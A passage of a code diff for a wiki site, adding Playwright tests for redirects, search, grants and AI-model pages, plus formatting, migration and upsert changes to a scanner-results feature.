+        'a[href*="/organizations/"], a[href*="/people/"], a[href*="/wiki/E"]'
+      );
+      const entityLinkCount = await entityProfileLinks.count();
+      console.log(`  ${path}: entity profile links: ${entityLinkCount}`);
+
+      // We should have at least some entity links if stakeholders are present
+      // (this is a soft check — some legislation may have no named stakeholders)
+      const hasStakeholderSection =
+        /stakeholder/i.test(bodyText) ||
+        /signator/i.test(bodyText);
+
+      if (hasStakeholderSection) {
+        // If there is a stakeholder section, it should have at least some links
+        // (could be external links to org pages or internal entity links)
+        const allLinks = page.locator(
+          'a[href*="/organizations/"], a[href*="/people/"], a[href*="/wiki/E"], a[href*="/legislation/"]'
+        );
+        const totalLinkCount = await allLinks.count();
+        console.log(`  ${path}: has stakeholder section, total relevant links: ${totalLinkCount}`);
+
+        // The page should have at least one link if stakeholders are shown
+        expect(
+          totalLinkCount,
+          `${path} has a stakeholder section but no entity/legislation links`
+        ).toBeGreaterThan(0);
+      } else {
+        console.log(`  ${path}: no stakeholder section detected — skipping link check`);
+      }
+    });
+  }
+});
+
+// ─── Bonus: All tested legislation pages return 200 ─────────────────────────
+
+test.describe("All legislation pages return 200", () => {
+  const LEGISLATION_PAGES = [
+    "/legislation",
+    "/legislation/coe-ai-convention",
+    "/legislation/un-ai-governance-resolution",
+    "/legislation/seoul-declaration",
+    "/legislation/nist-ai-rmf",
+    "/legislation/ai-lead-act",
+  ];
+
+  for (const path of LEGISLATION_PAGES) {
+    test(`${path} returns 200`, async ({ page }) => {
+      const response = await goto(page, path);
+      expect(response?.status(), `${path} should return 200`).toBe(200);
+    });
+  }
+});

--- a/apps/web/e2e/verify-redirects-misc.spec.ts
+++ b/apps/web/e2e/verify-redirects-misc.spec.ts
@@ -1,0 +1,518 @@
+import { test, expect, type Page } from "@playwright/test";
+
+/**
+ * Redirects & Miscellaneous Feature Verification
+ *
+ * Targets https://www.longtermwiki.com to verify features from PRs:
+ * #3679, #3641, #3688, #3675, #3610
+ *
+ * Run:
+ *   cd /Users/ozziegooen/Documents/GitHub.nosync/lw/main && \
+ *   PLAYWRIGHT_BASE_URL=https://www.longtermwiki.com \
+ *   npx playwright test /tmp/verify-redirects-misc.spec.ts --project=chromium --reporter=list
+ */
+
+// ─── 1. Legislation redirects ────────────────────────────────────────────────
+
+test.describe("1. Legislation redirects", () => {
+  test("/legislation/executive-order-14110 redirects to a valid page", async ({
+    page,
+  }) => {
+    const response = await page.goto("/legislation/executive-order-14110", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    // Should land on a valid page (redirect chain resolves to 200)
+    const finalStatus = response?.status();
+    console.log(
+      `  Final status: ${finalStatus}, URL: ${page.url()}`
+    );
+
+    // The page should have redirected or loaded directly
+    expect([200, 301, 302, 307, 308]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText).not.toContain("404");
+    expect(bodyText!.length).toBeGreaterThan(200);
+
+    // Should be at a meaningful page now (either the legislation page or a wiki page)
+    const currentUrl = page.url();
+    console.log(`  Landed at: ${currentUrl}`);
+    expect(currentUrl).not.toContain("404");
+  });
+});
+
+// ─── 2. Data sources redirect ────────────────────────────────────────────────
+
+test.describe("2. Data sources redirect", () => {
+  test("/data-sources redirects to /sources?tab=data-sources or similar", async ({
+    page,
+  }) => {
+    const response = await page.goto("/data-sources", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const finalStatus = response?.status();
+    const finalUrl = page.url();
+    console.log(`  Final status: ${finalStatus}, URL: ${finalUrl}`);
+
+    // Should not 404
+    expect([200, 301, 302, 307, 308]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+
+    // The URL should contain something sources-related, or we should be at a sources page
+    const isSourcesRelated =
+      finalUrl.includes("sources") ||
+      finalUrl.includes("data-sources") ||
+      (bodyText || "").toLowerCase().includes("source");
+    console.log(`  Sources-related destination: ${isSourcesRelated}`);
+    console.log(`  Final URL: ${finalUrl}`);
+  });
+});
+
+// ─── 3. Sources page ─────────────────────────────────────────────────────────
+
+test.describe("3. Sources page (PR #3675)", () => {
+  test("/sources loads and renders", async ({ page }) => {
+    const response = await page.goto("/sources", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const finalStatus = response?.status();
+    const finalUrl = page.url();
+    console.log(`  Status: ${finalStatus}, URL: ${finalUrl}`);
+
+    expect([200, 301, 302, 307, 308]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(100);
+
+    // Check page has some heading
+    const h1 = page.locator("h1").first();
+    const hasH1 = (await h1.count()) > 0;
+    if (hasH1) {
+      const h1Text = await h1.textContent();
+      console.log(`  Page heading: ${h1Text}`);
+    }
+  });
+});
+
+// ─── 4. Source-checks search with special characters ─────────────────────────
+
+test.describe("4. Source-checks search (special chars)", () => {
+  test("/source-checks page loads and search with % and _ doesn't crash", async ({
+    page,
+  }) => {
+    const response = await page.goto("/source-checks", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const finalStatus = response?.status();
+    const finalUrl = page.url();
+    console.log(`  Status: ${finalStatus}, URL: ${finalUrl}`);
+
+    expect([200, 301, 302, 307, 308]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+
+    // Look for any search/filter input on the page
+    const searchInput = page.locator('input[type="search"], input[placeholder*="search" i], input[placeholder*="filter" i], input[placeholder*="query" i]').first();
+    const hasSearch = (await searchInput.count()) > 0;
+    console.log(`  Search input found: ${hasSearch}`);
+
+    if (hasSearch) {
+      // Type special characters into search
+      await searchInput.click();
+      await searchInput.fill("%25");
+      await page.waitForTimeout(1000);
+
+      const afterPercentBody = await page.locator("body").textContent();
+      expect(afterPercentBody).not.toContain("Application error");
+      expect(afterPercentBody).not.toContain("Internal Server Error");
+      console.log(`  After '%25' search: page still healthy`);
+
+      // Try underscore
+      await searchInput.fill("_test");
+      await page.waitForTimeout(1000);
+
+      const afterUnderscoreBody = await page.locator("body").textContent();
+      expect(afterUnderscoreBody).not.toContain("Application error");
+      expect(afterUnderscoreBody).not.toContain("Internal Server Error");
+      console.log(`  After '_test' search: page still healthy`);
+
+      // Clear search
+      await searchInput.fill("");
+    } else {
+      // Try URL-based search if no input found
+      const searchResponse = await page.goto(
+        "/source-checks?q=%25test%25",
+        { waitUntil: "networkidle", timeout: 30000 }
+      );
+      const searchStatus = searchResponse?.status();
+      console.log(`  URL search with % status: ${searchStatus}`);
+      expect([200, 301, 302, 307, 308, 404]).toContain(searchStatus);
+
+      if (searchStatus === 200) {
+        const searchBody = await page.locator("body").textContent();
+        expect(searchBody).not.toContain("Application error");
+        expect(searchBody).not.toContain("Internal Server Error");
+      }
+    }
+  });
+});
+
+// ─── 5. People stableId redirect ─────────────────────────────────────────────
+
+test.describe("5. People stableId redirect", () => {
+  test("/people/sid_JceuRU3tbg (stableId format) should redirect, not show raw content", async ({
+    page,
+  }) => {
+    const response = await page.goto("/people/sid_JceuRU3tbg", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const finalStatus = response?.status();
+    const finalUrl = page.url();
+    console.log(`  Final status: ${finalStatus}, URL: ${finalUrl}`);
+
+    // Should either redirect to a proper slug or show a 404 — but NOT show raw stableId in URL as final destination
+    // Acceptable outcomes: redirect (chain → 200), 404, or redirect to slug-based URL
+    expect([200, 301, 302, 307, 308, 404]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText).not.toContain("Unhandled Runtime Error");
+
+    // If we got a 200, verify it's not just displaying a broken/empty page
+    if (finalStatus === 200) {
+      expect(bodyText!.length).toBeGreaterThan(100);
+      // The final URL should ideally NOT still contain the raw stableId as a non-redirected path
+      const hasStableIdInFinalUrl =
+        finalUrl.includes("sid_JceuRU3tbg") && !finalUrl.includes("?") && !finalUrl.includes("#");
+      console.log(`  Final URL still has stableId: ${hasStableIdInFinalUrl}`);
+    }
+
+    console.log(`  Final URL: ${finalUrl}`);
+  });
+
+  test("People directory loads to confirm people pages work", async ({
+    page,
+  }) => {
+    const response = await page.goto("/people", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+    expect(response?.status()).toBe(200);
+
+    // Find a people link with stableId format to test
+    const stableIdLinks = page.locator('a[href*="/people/sid_"]');
+    const stableIdCount = await stableIdLinks.count();
+    console.log(`  People links with stableId format: ${stableIdCount}`);
+
+    if (stableIdCount > 0) {
+      const firstHref = await stableIdLinks.first().getAttribute("href");
+      console.log(`  First stableId link: ${firstHref}`);
+
+      // These should redirect to a canonical URL, not show the stableId as the final URL
+      const detailResponse = await page.goto(firstHref!, {
+        waitUntil: "networkidle",
+        timeout: 30000,
+      });
+      const detailStatus = detailResponse?.status();
+      const detailUrl = page.url();
+      console.log(`  stableId page result: status=${detailStatus}, url=${detailUrl}`);
+      expect([200, 301, 302, 307, 308, 404]).toContain(detailStatus);
+    }
+  });
+});
+
+// ─── 6. Grant detail notes — newline rendering ────────────────────────────────
+
+test.describe("6. Grant detail notes rendering", () => {
+  test("Grant detail pages render newlines properly (not literal \\n)", async ({
+    page,
+  }) => {
+    // First find grants with notes by going to a grant detail page
+    await page.goto("/grants", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+
+    // Find a grant detail link
+    const grantLinks = page.locator('a[href*="/grants/"]');
+    const grantCount = await grantLinks.count();
+    console.log(`  Grant detail links found: ${grantCount}`);
+
+    if (grantCount > 0) {
+      const firstGrantHref = await grantLinks.first().getAttribute("href");
+      console.log(`  Checking grant: ${firstGrantHref}`);
+
+      const detailResponse = await page.goto(firstGrantHref!, {
+        waitUntil: "networkidle",
+        timeout: 30000,
+      });
+      const detailStatus = detailResponse?.status();
+      console.log(`  Grant detail status: ${detailStatus}`);
+
+      if (detailStatus === 200) {
+        const detailBody = await page.locator("body").textContent();
+        expect(detailBody).not.toContain("Application error");
+
+        // Check that literal \n characters are not VISIBLE in rendered text.
+        // Use innerText() (visible rendered text only) rather than textContent() which
+        // also includes Next.js __next_f script payload that legitimately contains \n sequences.
+        const visibleText = await page.locator("body").innerText();
+        const hasLiteralBackslashN = visibleText.includes("\\n");
+        console.log(`  Has literal \\n in visible text: ${hasLiteralBackslashN}`);
+        expect(
+          hasLiteralBackslashN,
+          "Grant detail page should not display literal \\n characters in visible text"
+        ).toBe(false);
+      }
+    } else {
+      // Try a direct grant page if no links
+      console.log(`  No grant links found on /grants — trying direct access`);
+      const directResponse = await page.goto("/grants", {
+        waitUntil: "networkidle",
+        timeout: 30000,
+      });
+      expect(directResponse?.status()).toBe(200);
+    }
+  });
+});
+
+// ─── 7. AI Models safety levels ──────────────────────────────────────────────
+
+test.describe("7. AI Models safety levels", () => {
+  test("/ai-models shows safety level info (ASL-3, etc.) for Claude models", async ({
+    page,
+  }) => {
+    const response = await page.goto("/ai-models", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    expect(response?.status()).toBe(200);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+
+    // Check for safety level indicators — ASL-2, ASL-3, etc.
+    const hasAslLevels =
+      bodyText!.includes("ASL-2") ||
+      bodyText!.includes("ASL-3") ||
+      bodyText!.includes("ASL-4") ||
+      bodyText!.includes("ASL") ||
+      bodyText!.toLowerCase().includes("safety level") ||
+      bodyText!.toLowerCase().includes("responsible scaling");
+
+    console.log(`  Has ASL/safety level info: ${hasAslLevels}`);
+
+    // Log what AI safety-related content is on the page
+    const aslMatches = bodyText!.match(/ASL-\d/g) || [];
+    const uniqueAsl = [...new Set(aslMatches)];
+    console.log(`  ASL levels found: ${uniqueAsl.join(", ") || "none"}`);
+
+    expect(
+      hasAslLevels,
+      "AI models page should show safety level information (ASL-2, ASL-3, etc.)"
+    ).toBe(true);
+
+    // Also check Claude is listed
+    const hasClaude =
+      bodyText!.includes("Claude") || bodyText!.includes("claude");
+    console.log(`  Has Claude model entries: ${hasClaude}`);
+  });
+});
+
+// ─── 8. Benchmark pages — grammar (singular/plural) ──────────────────────────
+
+test.describe("8. Benchmark pages grammar", () => {
+  test('Benchmark pages show "1 model" not "1 models" (singular grammar)', async ({
+    page,
+  }) => {
+    // Go to benchmarks directory first
+    const benchmarksResponse = await page.goto("/benchmarks", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const benchmarksStatus = benchmarksResponse?.status();
+    console.log(`  /benchmarks status: ${benchmarksStatus}`);
+
+    if (benchmarksStatus === 404) {
+      // Try /ai-models which might have benchmark info
+      await page.goto("/ai-models", { waitUntil: "networkidle", timeout: 30000 });
+    }
+
+    // Find a benchmark detail page
+    const benchmarkLinks = page.locator(
+      'a[href*="/benchmarks/"], a[href*="/benchmark/"]'
+    );
+    const benchmarkCount = await benchmarkLinks.count();
+    console.log(`  Benchmark links found: ${benchmarkCount}`);
+
+    let testedPage = false;
+
+    if (benchmarkCount > 0) {
+      for (let i = 0; i < Math.min(5, benchmarkCount); i++) {
+        const href = await benchmarkLinks.nth(i).getAttribute("href");
+        if (!href) continue;
+
+        const detailResponse = await page.goto(href, {
+          waitUntil: "networkidle",
+          timeout: 30000,
+        });
+        const detailStatus = detailResponse?.status();
+
+        if (detailStatus === 200) {
+          const bodyText = await page.locator("body").textContent();
+          console.log(`  Checking benchmark page: ${href}`);
+
+          // Check for "1 models" (incorrect) vs "1 model" (correct)
+          const hasIncorrectSingular = /\b1\s+models?\b/.test(bodyText!) &&
+            bodyText!.match(/\b1\s+models\b/i);
+          const incorrectMatches = bodyText!.match(/\b1\s+models\b/gi) || [];
+
+          if (incorrectMatches.length > 0) {
+            console.log(
+              `  FAIL: Found "${incorrectMatches[0]}" — should be "1 model" (singular)`
+            );
+          } else {
+            console.log(`  OK: No "1 models" found on ${href}`);
+          }
+
+          expect(
+            incorrectMatches.length,
+            `Found incorrect "1 models" on ${href}`
+          ).toBe(0);
+
+          testedPage = true;
+          break;
+        }
+      }
+    }
+
+    if (!testedPage) {
+      console.log(`  No benchmark detail pages accessible — checking /benchmarks page text`);
+      const currentBodyText = await page.locator("body").textContent();
+      const incorrectMatches = currentBodyText!.match(/\b1\s+models\b/gi) || [];
+      console.log(
+        `  "1 models" occurrences on benchmarks listing: ${incorrectMatches.length}`
+      );
+      expect(
+        incorrectMatches.length,
+        `Found incorrect "1 models" on benchmarks page`
+      ).toBe(0);
+    }
+  });
+});
+
+// ─── 9. Navigation restructure — Sources dropdown ────────────────────────────
+
+test.describe("9. Navigation restructure (PR #3675)", () => {
+  test("Sources dropdown or link exists in navigation", async ({ page }) => {
+    await page.goto("/", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    // Look for Sources in the navigation
+    const header = page.locator("header, nav").first();
+    const headerText = await header.textContent();
+    console.log(`  Nav/header text: ${headerText?.substring(0, 300)}`);
+
+    // Check for Sources in navigation (could be a link or dropdown trigger)
+    const sourcesNavLink = page.locator(
+      'nav a[href*="/sources"], header a[href*="/sources"], ' +
+      'nav button:has-text("Sources"), header button:has-text("Sources"), ' +
+      'nav a:has-text("Sources"), header a:has-text("Sources")'
+    );
+    const sourcesNavCount = await sourcesNavLink.count();
+    console.log(`  Sources nav elements found: ${sourcesNavCount}`);
+
+    // Also check the full header for Sources text
+    const headerHasSources =
+      (headerText || "").includes("Sources") ||
+      (headerText || "").includes("sources");
+
+    console.log(`  Header contains 'Sources': ${headerHasSources}`);
+
+    if (sourcesNavCount > 0 || headerHasSources) {
+      console.log(`  PASS: Sources is present in navigation`);
+    } else {
+      // Maybe it's in a dropdown/hamburger — check by looking at all nav links
+      const allNavLinks = await page.locator("nav a, header a").allTextContents();
+      console.log(`  All nav links: ${allNavLinks.join(", ")}`);
+    }
+
+    expect(
+      sourcesNavCount > 0 || headerHasSources,
+      "Sources should be present in navigation (PR #3675 restructured nav)"
+    ).toBe(true);
+  });
+
+  test("/sources page is accessible after nav restructure", async ({ page }) => {
+    const response = await page.goto("/sources", {
+      waitUntil: "networkidle",
+      timeout: 30000,
+    });
+
+    const finalStatus = response?.status();
+    const finalUrl = page.url();
+    console.log(`  /sources status: ${finalStatus}, url: ${finalUrl}`);
+
+    // Should be accessible (not 404)
+    expect([200, 301, 302, 307, 308]).toContain(finalStatus);
+
+    const bodyText = await page.locator("body").textContent();
+    expect(bodyText).not.toContain("Application error");
+    expect(bodyText!.length).toBeGreaterThan(100);
+  });
+});
+
+// ─── Bonus: Verify all tested routes don't 404 ───────────────────────────────
+
+test.describe("Bonus: Key routes return valid responses", () => {
+  const ROUTES = [
+    { path: "/legislation/executive-order-14110", description: "EO-14110 legislation page" },
+    { path: "/sources", description: "Sources page" },
+    { path: "/source-checks", description: "Source checks dashboard" },
+    { path: "/ai-models", description: "AI Models directory" },
+    { path: "/benchmarks", description: "Benchmarks directory" },
+    { path: "/grants", description: "Grants directory" },
+  ];
+
+  for (const { path, description } of ROUTES) {
+    test(`${path} (${description}) returns valid response`, async ({ page }) => {
+      const response = await page.goto(path, {
+        waitUntil: "networkidle",
+        timeout: 30000,
+      });
+      const status = response?.status();
+      const finalUrl = page.url();
+      console.log(`  ${path} → ${status} (${finalUrl})`);
+
+      // Should not be a server error (5xx)
+      if (status !== undefined) {
+        expect(status).toBeLessThan(500);
+      }
+
+      const bodyText = await page.locator("body").textContent();
+      expect(bodyText).not.toContain("Application error");
+    });
+  }
+});

--- a/apps/web/e2e/verify-redirects-misc.spec.ts
+++ b/apps/web/e2e/verify-redirects-misc.spec.ts
@@ -7,9 +7,8 @@ import { test, expect, type Page } from "@playwright/test";
  * #3679, #3641, #3688, #3675, #3610
  *
  * Run:
- *   cd /Users/ozziegooen/Documents/GitHub.nosync/lw/main && \
  *   PLAYWRIGHT_BASE_URL=https://www.longtermwiki.com \
- *   npx playwright test /tmp/verify-redirects-misc.spec.ts --project=chromium --reporter=list
+ *   npx playwright test apps/web/e2e/verify-redirects-misc.spec.ts --project=chromium --reporter=list
  */
 
 // ─── 1. Legislation redirects ────────────────────────────────────────────────

--- a/apps/web/src/app/internal/tablebase-coverage/coverage-table.tsx
+++ b/apps/web/src/app/internal/tablebase-coverage/coverage-table.tsx
@@ -115,7 +115,7 @@ const columns: ColumnDef<CoverageRow>[] = [
         <span
           className={`inline-flex items-center rounded-full px-2 py-0.5 text-xs font-medium ${completenessBadgeClass(pct)}`}
         >
-          {pct}%
+          {pct.toFixed(1)}%
         </span>
       );
     },
@@ -189,6 +189,23 @@ export function CoverageTable({ data, recordTypes, entityTypes }: CoverageTableP
   const [recordTypeFilter, setRecordTypeFilter] = useState<string>("all");
   const [entityTypeFilter, setEntityTypeFilter] = useState<string>("all");
 
+  // Precompute filter option counts once per data change (avoids O(n*m) on every render)
+  const recordTypeCounts = useMemo(() => {
+    const counts = new Map<string, number>();
+    for (const r of data) {
+      counts.set(r.recordType, (counts.get(r.recordType) ?? 0) + 1);
+    }
+    return counts;
+  }, [data]);
+
+  const entityTypeCounts = useMemo(() => {
+    const counts = new Map<string, number>();
+    for (const r of data) {
+      counts.set(r.entityType, (counts.get(r.entityType) ?? 0) + 1);
+    }
+    return counts;
+  }, [data]);
+
   const filtered = useMemo(() => {
     let rows = data;
     if (recordTypeFilter !== "all") {
@@ -241,7 +258,7 @@ export function CoverageTable({ data, recordTypes, entityTypes }: CoverageTableP
           <option value="all">All record types ({data.length})</option>
           {recordTypes.map((t) => (
             <option key={t} value={t}>
-              {t} ({data.filter((r) => r.recordType === t).length})
+              {t} ({recordTypeCounts.get(t) ?? 0})
             </option>
           ))}
         </select>
@@ -254,7 +271,7 @@ export function CoverageTable({ data, recordTypes, entityTypes }: CoverageTableP
           <option value="all">All entity types</option>
           {entityTypes.map((t) => (
             <option key={t} value={t}>
-              {t} ({data.filter((r) => r.entityType === t).length})
+              {t} ({entityTypeCounts.get(t) ?? 0})
             </option>
           ))}
         </select>

--- a/apps/web/src/app/internal/tablebase-coverage/tablebase-coverage-content.tsx
+++ b/apps/web/src/app/internal/tablebase-coverage/tablebase-coverage-content.tsx
@@ -41,12 +41,6 @@ interface TrendRun {
 
 interface TrendsResponse {
   runs: TrendRun[];
-  entityTrends: Array<{
-    scanRunId: string;
-    completenessPct: number;
-    totalRecords: number;
-    scannedAt: string;
-  }>;
 }
 
 interface TrendsByTypePoint {
@@ -384,7 +378,7 @@ export async function TablebaseCoverageContent() {
       {/* Summary stats */}
       <div className="grid grid-cols-2 md:grid-cols-5 gap-4 my-6">
         <StatCard label="Entities Scanned" value={totalEntities.toLocaleString()} />
-        <StatCard label="Avg Completeness" value={`${globalAvgCompleteness}%`}>
+        <StatCard label="Avg Completeness" value={`${globalAvgCompleteness.toFixed(1)}%`}>
           <TrendIndicator runs={trendRuns} />
         </StatCard>
         <StatCard label="Total Records" value={totalRecords.toLocaleString()} />
@@ -443,7 +437,7 @@ export async function TablebaseCoverageContent() {
                     <TrendDelta delta={ts.trendDelta} />
                   </div>
                   <span className="text-xs text-muted-foreground tabular-nums">
-                    {ts.entityCount} entities, {ts.totalRecords.toLocaleString()} records, avg {ts.avgCompleteness}%
+                    {ts.entityCount} entities, {ts.totalRecords.toLocaleString()} records, avg {ts.avgCompleteness.toFixed(1)}%
                   </span>
                 </div>
                 <CompletenessBar stats={ts} />
@@ -504,7 +498,7 @@ export async function TablebaseCoverageContent() {
                       {run.totalItems.toLocaleString()}
                     </td>
                     <td className="py-2 pr-4 text-right tabular-nums">
-                      {run.avgCompleteness}%
+                      {run.avgCompleteness.toFixed(1)}%
                     </td>
                     <td className="py-2 text-right tabular-nums">
                       {run.totalRecordsSum.toLocaleString()}

--- a/apps/wiki-server/drizzle/0172_create_scanner_results.sql
+++ b/apps/wiki-server/drizzle/0172_create_scanner_results.sql
@@ -4,7 +4,7 @@
 -- grouped by scan_run_id for trend analysis.
 
 CREATE TABLE IF NOT EXISTS tablebase_scanner_results (
-  id             SERIAL PRIMARY KEY,
+  id             BIGSERIAL PRIMARY KEY,
   scan_run_id    TEXT         NOT NULL,
   record_type    TEXT         NOT NULL,
   entity_id      TEXT         NOT NULL,

--- a/apps/wiki-server/drizzle/0172_create_scanner_results.sql
+++ b/apps/wiki-server/drizzle/0172_create_scanner_results.sql
@@ -23,3 +23,4 @@ CREATE INDEX IF NOT EXISTS idx_scanner_results_run_id ON tablebase_scanner_resul
 CREATE INDEX IF NOT EXISTS idx_scanner_results_entity ON tablebase_scanner_results (entity_id);
 CREATE INDEX IF NOT EXISTS idx_scanner_results_scanned_at ON tablebase_scanner_results (scanned_at);
 CREATE INDEX IF NOT EXISTS idx_scanner_results_type_entity ON tablebase_scanner_results (record_type, entity_id);
+CREATE UNIQUE INDEX IF NOT EXISTS uq_scanner_results_natural_key ON tablebase_scanner_results (scan_run_id, record_type, entity_id);

--- a/apps/wiki-server/src/__tests__/scanner-results.test.ts
+++ b/apps/wiki-server/src/__tests__/scanner-results.test.ts
@@ -2,7 +2,7 @@
  * Tests for the scanner-results route.
  *
  * Validates:
- *   1. POST /sync inserts items and returns count
+ *   1. POST /sync upserts items and returns count
  *   2. Schema validation rejects invalid payloads
  *   3. Empty batch rejected (min 1 item)
  *   4. POST /run triggers server-side scan and persists results
@@ -17,26 +17,22 @@ import { mockDbModule, postJson } from "./test-utils.js";
 // ---- In-memory store ----
 
 let insertedRows: Record<string, unknown>[];
-/** Known entity IDs — validateEntityRefs checks these exist */
-let knownEntityIds: Set<string>;
 
 function resetStores() {
   insertedRows = [];
-  // Pre-populate with the entity IDs used in test fixtures
-  knownEntityIds = new Set(["sid_abc1234567", "sid_def7654321"]);
 }
 
 function dispatch(query: string, params: unknown[]): unknown[] {
   const q = query.toLowerCase();
 
-  // validateEntityRefs: unnest + entities check
-  if (q.includes("unnest") && q.includes("from entities")) {
-    return params
-      .filter((p) => knownEntityIds.has(p as string))
-      .map((p) => ({ ref: p }));
+  // validateEntityRefs: unnest + entities lookup — return all IDs as found
+  // The query selects `unnest AS ref`, so return {ref: id} for each ID.
+  if (q.includes("unnest") && q.includes("entities")) {
+    const ids = Array.isArray(params[0]) ? params[0] : params;
+    return (ids as string[]).map((id) => ({ ref: id }));
   }
 
-  // INSERT
+  // INSERT / ON CONFLICT (upsert)
   if (q.includes("insert into")) {
     insertedRows.push({ query: q, params });
     return [];

--- a/apps/wiki-server/src/routes/tablebase/scanner-results.ts
+++ b/apps/wiki-server/src/routes/tablebase/scanner-results.ts
@@ -43,21 +43,8 @@ const SyncBatchSchema = z.object({
 
 type SyncItem = z.infer<typeof SyncItemSchema>;
 
-interface ScannerResultRow {
-  id: number;
-  scanRunId: string;
-  recordType: string;
-  entityId: string;
-  entityName: string;
-  entityType: string;
-  totalRecords: number;
-  verifiedRecords: number;
-  completenessPct: number;
-  missingFields: string[] | null;
-  entityImportance: number | null;
-  scannedAt: Date;
-  createdAt: Date;
-}
+// Drizzle-inferred row type from the table definition
+type ScannerResultRow = typeof tablebaseScannerResults.$inferSelect;
 
 function formatRow(r: ScannerResultRow) {
   return {
@@ -77,6 +64,9 @@ function formatRow(r: ScannerResultRow) {
   };
 }
 
+// Not using createSyncHandler factory: this table uses auto-increment integer PK
+// and pure INSERT semantics without a string ID field, which doesn't fit the
+// factory's TItem constraint (requires { id?: string }).
 const scannerResultsApp = new Hono()
   // GET /latest — returns the most recent scan run's results
   .get("/latest", zv("query", LatestQuery), async (c) => {
@@ -113,7 +103,7 @@ const scannerResultsApp = new Hono()
     ]);
 
     return c.json({
-      items: rows.map((r) => formatRow(r as ScannerResultRow)),
+      items: rows.map(formatRow),
       // count() may return bigint as string from postgres.js — coerce to number
       total: Number(totalRows[0]?.count ?? 0),
       scanRunId: runId,
@@ -194,8 +184,8 @@ const scannerResultsApp = new Hono()
       existing.push({
         scanRunId: row.scanRunId,
         scannedAt: row.scannedAt,
-        avgCompleteness: row.avgCompleteness,
-        entityCount: row.entityCount,
+        avgCompleteness: Number(row.avgCompleteness),
+        entityCount: Number(row.entityCount),
       });
       byTypeMap.set(row.recordType, existing);
     }

--- a/apps/wiki-server/src/routes/tablebase/scanner-results.ts
+++ b/apps/wiki-server/src/routes/tablebase/scanner-results.ts
@@ -53,7 +53,7 @@ interface ScannerResultRow {
   totalRecords: number;
   verifiedRecords: number;
   completenessPct: number;
-  missingFields: unknown;
+  missingFields: string[] | null;
   entityImportance: number | null;
   scannedAt: Date;
   createdAt: Date;
@@ -114,13 +114,14 @@ const scannerResultsApp = new Hono()
 
     return c.json({
       items: rows.map((r) => formatRow(r as ScannerResultRow)),
-      total: totalRows[0]?.count ?? 0,
+      // count() may return bigint as string from postgres.js — coerce to number
+      total: Number(totalRows[0]?.count ?? 0),
       scanRunId: runId,
     });
   })
   // GET /trends — scan results grouped by scan_run_id for trend analysis
   .get("/trends", zv("query", TrendsQuery), async (c) => {
-    const { entityId, recordType, limit } = c.req.valid("query");
+    const { limit } = c.req.valid("query");
     const db = getDrizzleDb();
 
     // Get distinct scan runs ordered by recency
@@ -139,44 +140,15 @@ const scannerResultsApp = new Hono()
 
     const runs = await runsQuery;
 
-    // If entityId or recordType filter is requested, also get per-run details for that filter
-    let entityTrends: Array<{ scanRunId: string; completenessPct: number; totalRecords: number; scannedAt: string }> = [];
-    if (entityId || recordType) {
-      const conditions = [];
-      if (entityId) conditions.push(eq(tablebaseScannerResults.entityId, entityId));
-      if (recordType) conditions.push(eq(tablebaseScannerResults.recordType, recordType));
-      const combinedWhere = conditions.length === 1
-        ? conditions[0]
-        : sql`${sql.join(conditions, sql` AND `)}`;
-
-      const details = await db
-        .select({
-          scanRunId: tablebaseScannerResults.scanRunId,
-          completenessPct: tablebaseScannerResults.completenessPct,
-          totalRecords: tablebaseScannerResults.totalRecords,
-          scannedAt: tablebaseScannerResults.scannedAt,
-        })
-        .from(tablebaseScannerResults)
-        .where(combinedWhere)
-        .orderBy(desc(tablebaseScannerResults.scannedAt));
-
-      entityTrends = details.map((d) => ({
-        scanRunId: d.scanRunId,
-        completenessPct: d.completenessPct,
-        totalRecords: d.totalRecords,
-        scannedAt: d.scannedAt.toISOString(),
-      }));
-    }
-
     return c.json({
       runs: runs.map((r) => ({
         scanRunId: r.scanRunId,
         scannedAt: r.scannedAt,
-        totalItems: r.totalItems,
-        avgCompleteness: r.avgCompleteness,
-        totalRecordsSum: r.totalRecordsSum,
+        // count()/SUM()/AVG() may return bigint as string from postgres.js — coerce to number
+        totalItems: Number(r.totalItems),
+        avgCompleteness: Number(r.avgCompleteness),
+        totalRecordsSum: Number(r.totalRecordsSum),
       })),
-      entityTrends,
     });
   })
   // GET /trends-by-type — per-recordType trend data across scan runs (for sparklines)
@@ -261,16 +233,37 @@ const scannerResultsApp = new Hono()
       scannedAt: item.scannedAt ? new Date(item.scannedAt) : now,
     }));
 
-    // Insert in chunks to avoid exceeding PG parameter limit
+    // Upsert in chunks to avoid exceeding PG parameter limit.
+    // ON CONFLICT on the natural key (scan_run_id, record_type, entity_id)
+    // prevents duplicates if sync runs twice.
     const CHUNK_SIZE = 500;
-    let inserted = 0;
+    let upserted = 0;
     for (let i = 0; i < rows.length; i += CHUNK_SIZE) {
       const chunk = rows.slice(i, i + CHUNK_SIZE);
-      await db.insert(tablebaseScannerResults).values(chunk);
-      inserted += chunk.length;
+      await db
+        .insert(tablebaseScannerResults)
+        .values(chunk)
+        .onConflictDoUpdate({
+          target: [
+            tablebaseScannerResults.scanRunId,
+            tablebaseScannerResults.recordType,
+            tablebaseScannerResults.entityId,
+          ],
+          set: {
+            entityName: sql`excluded.entity_name`,
